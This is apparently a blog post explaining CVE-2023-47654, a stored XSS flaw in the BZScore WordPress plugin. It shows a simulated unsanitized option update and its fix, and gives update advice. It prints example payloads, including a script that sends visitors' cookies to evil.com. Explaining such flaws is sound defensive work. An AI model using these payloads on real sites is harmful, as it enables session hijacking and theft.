CVE CyberSecurity Database News

CVE-2023-47654 - How a Contributor Could Hack Your Site With The BZScore WordPress Plugin (Explained)

Poster -

CVE-2023-47654 is a vulnerability that lets low-privileged users (contributors and above) inject malicious code into WordPress sites using the “BZScore – Live Score” plugin, versions up to and including 1.03. This post will break down how this Stored Cross-Site Scripting (XSS) bug works, show code snippets to demonstrate the exploit, and help you understand the risk.

What Is CVE-2023-47654?

This is a stored XSS vulnerability affecting the livescore.Bz BZScore – Live Score WordPress plugin. Anyone with contributor access or higher can insert malicious JavaScript code into the site. Once injected, the code will execute in visitors’ browsers—potentially stealing cookies, hijacking sessions, or manipulating the site pages.

If you run the BZScore plugin ≤ 1.03, update or disable it now!

Original References

- Wordfence Advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/bfbc2ba2-45c3-46a4-97d4-cabb2c9c856?source=cve
- WPScan: https://wpscan.com/vulnerability/CVE-2023-47654

Where’s the Flaw?

The plugin has a settings page where users can add or customize widgets and live score options. The problem: The code handling these settings does not sanitize user input properly. When a contributor (or higher role) saves malicious JavaScript into a setting, it gets stored in the database and displayed on the site for everyone—including visitors and admins.

Administrator

So, even if you just give someone contributor access to your site, they could hack your entire site with this bug.

Example XSS Payload

<script>alert('XSS by Contributor')</script>

Or a more dangerous version

<script>fetch('https://evil.com/steal?cookie='; + document.cookie)</script>

Suppose the vulnerable field is “Widget Title.” The attacker enters

BZ Soccer Widget <script>alert('XSS!')</script>

When a site visitor (even the admin) visits the page displaying the widget, this JavaScript pops the alert or worse, runs malicious code.

A typical mistake in the plugin (note: this is simulated for explanation!)

// FLAWED: No sanitization!
update_option('bzscore_widget_title', $_POST['widget_title']);

It should use output escaping and input sanitization

// SAFE: Sanitizes input
update_option('bzscore_widget_title', sanitize_text_field($_POST['widget_title']));

Or output sanitize with

echo esc_html(get_option('bzscore_widget_title', 'Default Title'));

How To Protect Your Site

- Update BZScore to the latest version (check WordPress plugin repo)

Restrict contributor access unless necessary.

- Always install security plugins like Wordfence to detect and alert you of XSS attempts.

Summary

CVE-2023-47654 is a critical security threat in BZScore – Live Score plugin ≤ 1.03. It enables contributors and above to inject stored XSS code, threatening everyone who visits your site. Update your plugin now and stay secure!

For more in-depth info, check these resources

- Wordfence Vulnerability Page
- WPScan CVE-2023-47654

Timeline

Published on: 11/14/2023 19:15:31 UTC
Last modified on: 11/17/2023 15:56:18 UTC